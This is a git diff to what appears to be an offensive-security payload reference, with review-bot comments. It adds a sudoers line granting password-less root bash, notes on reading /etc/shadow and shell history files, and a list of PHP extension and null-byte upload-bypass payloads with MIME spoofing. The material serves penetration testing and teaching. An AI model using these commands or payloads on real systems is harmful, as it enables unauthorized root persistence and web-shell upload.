diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index caaf708..b684bc6 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -243,4 +243,5 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27% * [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/) * [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql) * [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/) -* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531) \ No newline at end of file +* [Introspection query leaks sensitive graphql system information - @Zuriel](https://hackerone.com/reports/291531) +* [Graphql Bug to Steal Anyone’s Address - Sept 1, 2019 - Pratik Yadav](https://medium.com/@pratiky054/graphql-bug-to-steal-anyones-address-fc34f0374417) \ No newline at end of file diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md index 9d83b6b..ccdb745 100644 --- a/JSON Web Token/README.md +++ b/JSON Web Token/README.md @@ -250,7 +250,7 @@ Secret is "Sn1f" ### Hashcat -> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](twitter.com/hashcat/status/955154646494040065) +> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](https://twitter.com/hashcat/status/955154646494040065) ```bash /hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index e9d0aab..53f5588 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md 
@@ -84,7 +84,7 @@ * Checks if password hashes are stored in /etc/passwd * Extract full details for 'default' uid's such as 0, 1000, 1001 etc * Attempt to read restricted files i.e. /etc/shadow - * List current users history files (i.e .bash_history, .nano_history etc.) + * List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.) * Basic SSH checks * Privileged access: * Which users have recently used sudo @@ -455,9 +455,9 @@ echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers # use SUDO without password echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers +echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers ``` - ## NFS Root Squashing When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it @@ -620,7 +620,7 @@ Precompiled exploits can be found inside these repositories, run them at your ow * [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits) * [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/) -The following exploits are known to work well. +The following exploits are known to work well, search for another exploits using `searchsploit -w linux kernel centos`. ### CVE-2016-5195 (DirtyCow) diff --git a/Upload Insecure Files/Extension PHP/extensions.lst b/Upload Insecure Files/Extension PHP/extensions.lst new file mode 100644 index 0000000..b348161 --- /dev/null +++ b/Upload Insecure Files/Extension PHP/extensions.lst @@ -0,0 +1,20 @@ +.jpeg.php +.jpg.php +.png.php +.php +.php3 +.php4 +.php5 +.php7 +.pht +.phar +.phpt +.pgif +.phtml +.phtm +.php%00.gif +.php\x00.gif +.php%00.png +.php\x00.png +.php%00.jpg +.php\x00.jpg \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index e0e7bb0..82347ce 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md 
@@ -54,8 +54,17 @@ Coldfusion: .cfm, .cfml, .cfc, .dbm ### Upload tricks -- Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()` +- Null byte (works well against `pathinfo()`) + * .php%00.gif + * .php\x00.gif + * .php%00.png + * .php\x00.png + * .php%00.jpg + * .php\x00.jpg - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` + * `Content-Type : image/gif` + * `Content-Type : image/png` + * `Content-Type : image/jpeg` ### Picture upload with LFI
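Review bot: the new reference line in `GraphQL Injection/README.md` still ends without a trailing newline (the `\ No newline at end of file` marker is repeated after the added `+* [Graphql Bug to Steal Anyone’s Address ...]` line), so the next reference appended to this list will again show up as a remove/re-add of the previous last line. Since the hunk already rewrites the file's last line, terminate it with a newline here.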
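Review bot: the added `echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers` line has no comment, unlike the entries above it (`# use SUDO without password`), so the reader cannot tell why a third variant is listed; add a comment saying it grants password-less root `/bin/bash` only (with no `(ALL)` runas spec the command runs as root by default) and consider whether the `username ALL=(ALL) NOPASSWD: ALL` line directly above already covers that case. The same hunk also removes the blank line between the closing fence and `## NFS Root Squashing`; that looks accidental and the blank line should stay for readability and markdown lint.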
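Review bot: the replacement sentence in the kernel-exploits hunk is a comma splice with a grammar slip: `The following exploits are known to work well, search for another exploits using ...`. Suggest `The following exploits are known to work well. Search for other exploits with \`searchsploit -w linux kernel centos\`.` Also, `centos` narrows the search to one distribution; note that the distro term should be swapped for the target's (or dropped) so the hint is not read as CentOS-specific.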
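Review bot: the `.php%00.gif` and `.php\x00.gif` entries in the new `Upload Insecure Files/Extension PHP/extensions.lst` only work if the tool consuming the list interprets them: `%00` has to reach the server un-encoded (Burp Intruder re-encodes `%` unless payload encoding is turned off) and `\x00` is a literal backslash, `x`, `0`, `0` sequence unless the tool unescapes it, so a line in the README stating how the list is meant to be fed (raw vs. decoded) would avoid silent false negatives. The list also duplicates the null-byte bullets added to `Upload Insecure Files/README.md` in the same commit; keep one as the source of truth or cross-reference them so the two do not drift apart. The file also ends without a trailing newline.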
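Review bot: in the Mime type bullet of `Upload Insecure Files/README.md` the parent line still says `to \`Content-Type : image/gif\`` while the new sub-bullets list gif, png and jpeg, so the first sub-bullet merely repeats the parent; rewrite the parent as `... to an image MIME type, for example:` and let the sub-bullets carry the values. The header is also written with a space before the colon (`Content-Type : image/gif`); `Content-Type: image/gif` is the form that appears in a request and is what a reader will paste, and `Mime type` should be `MIME type`. For the null byte bullet, the restructured list keeps `works well against \`pathinfo()\`` but drops the `shell.php%00.gif` example that showed the payload in context; a one-line note that null-byte truncation in PHP path handling was fixed in PHP 5.3.4 would keep readers from expecting it on current targets.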